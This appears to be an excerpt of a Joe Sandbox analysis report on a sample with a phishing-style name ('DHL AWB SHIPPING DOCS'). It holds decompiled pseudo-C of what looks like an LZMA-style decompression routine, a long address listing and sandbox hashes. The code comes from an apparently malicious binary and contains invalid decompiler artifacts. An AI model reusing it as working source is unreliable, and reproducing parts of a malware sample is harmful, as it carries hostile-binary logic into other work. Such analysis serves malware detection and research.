							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                        0x00406bc0
                        0x00406bc7
                        0x00406bcd
                        0x00406bd3
                        0x00000000
                        0x00406bd7
                        0x00406be3
                        0x00406be3
                        0x00406be3
                        0x00406bec
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x00000000
                        0x00406bf9
                        0x00406bfd
                        0x00000000
                        0x00000000
                        0x00406c06
                        0x00406c09
                        0x00406c0c
                        0x00406c0e
                        0x00406c10
                        0x00000000
                        0x00000000
                        0x00406c16
                        0x00406c19
                        0x00406c1b
                        0x00406c1c
                        0x00406c1f
                        0x00406c21
                        0x00406c22
                        0x00406c24
                        0x00406c27
                        0x00406c2c
                        0x00406c31
                        0x00406c3a
                        0x00406c4d
                        0x00406c50
                        0x00406c59
                        0x00406c5c
                        0x00406c84
                        0x00406c84
                        0x00406c86
                        0x00406c94
                        0x00406c94
                        0x00406c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c88
                        0x00406c88
                        0x00406c8b
                        0x00406c8b
                        0x00406c8c
                        0x00406c8c
                        0x00000000
                        0x00406c88
                        0x00406c5e
                        0x00406c62
                        0x00406c67
                        0x00406c67
                        0x00406c70
                        0x00406c76
                        0x00406c78
                        0x00406c7b
                        0x00000000
                        0x00406c81
                        0x00406c81
                        0x00000000
                        0x00406c81
                        0x00000000
                        0x00406c9e
                        0x00406c9e
                        0x00406ca2
                        0x0040754e
                        0x00000000
                        0x0040754e
                        0x00406cab
                        0x00406cbb
                        0x00406cbe
                        0x00406cc1
                        0x00406cc1
                        0x00406cc1
                        0x00406cc4
                        0x00406cc4
                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406ccd
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd2
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cef
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d35
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073dd
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x00407413
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040741c
                        0x0040741c
                        0x00407420
                        0x004075cf
                        0x00000000
                        0x004075cf
                        0x0040742c
                        0x00407433
                        0x0040743b
                        0x0040743b
                        0x0040743b
                        0x0040743e
                        0x00407441
                        0x00407441
                        0x00000000
                        0x00000000
                        0x00406d5f
                        0x00406d61
                        0x00406d64
                        0x00406dd5
                        0x00406dd8
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x00000000
                        0x00406dec
                        0x00406d66
                        0x00406d6a
                        0x00406d6d
                        0x00406d6f
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d87
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406d9c
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406dac
                        0x00406daf
                        0x00406dcd
                        0x00406dcf
                        0x00000000
                        0x00406dcf
                        0x00406db1
                        0x00406db4
                        0x00406db7
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00000000
                        0x00000000
                        0x00406ffe
                        0x00407002
                        0x00407020
                        0x00407023
                        0x0040702a
                        0x0040702d
                        0x00407030
                        0x00407033
                        0x00407036
                        0x00407039
                        0x0040703b
                        0x00407042
                        0x00407043
                        0x00407045
                        0x00407048
                        0x0040704b
                        0x0040704e
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x00000000
                        0x00000000
                        0x00407068
                        0x0040706c
                        0x0040708f
                        0x00407092
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x0040706e
                        0x00407071
                        0x00407074
                        0x00407077
                        0x00407084
                        0x00407087
                        0x00407087
                        0x00000000
                        0x00000000
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x00000000
                        0x00407137
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x00000000
                        0x00000000
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00000000
                        0x00407489
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407546
                        0x00000000
                        0x00000000
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00407194
                        0x00407197
                        0x0040719a
                        0x0040719c
                        0x0040719e
                        0x0040719e
                        0x0040719f
                        0x004071a2
                        0x004071a9
                        0x004071ac
                        0x004071ba
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x00000000
                        0x0040749f
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x00000000
                        0x004075db
                        0x004074a9
                        0x004074ac
                        0x004074af
                        0x004074b3
                        0x004074b6
                        0x004074bc
                        0x004074be
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x0040752b
                        0x0040752e
                        0x00407533
                        0x00407534
                        0x00407536
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00000000
                        0x00407447
                        0x004074cd
                        0x004074d3
                        0x004074d6
                        0x004074d9
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074eb
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x0040750d
                        0x00407510
                        0x00407514
                        0x00407516
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074f8
                        0x004074fd
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x0040751d
                        0x00407524
                        0x00000000
                        0x00407526
                        0x00000000
                        0x00407526
                        0x00000000
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x004075e5
                        0x004075eb
                        0x004075ed
                        0x004075f4
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000

                        Strings
                        • codeIncrementalHandleCreate, xrefs: 00406BB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID: codeIncrementalHandleCreate
                        • API String ID: 0-1664959861
                        • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                        • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                        • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                        • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
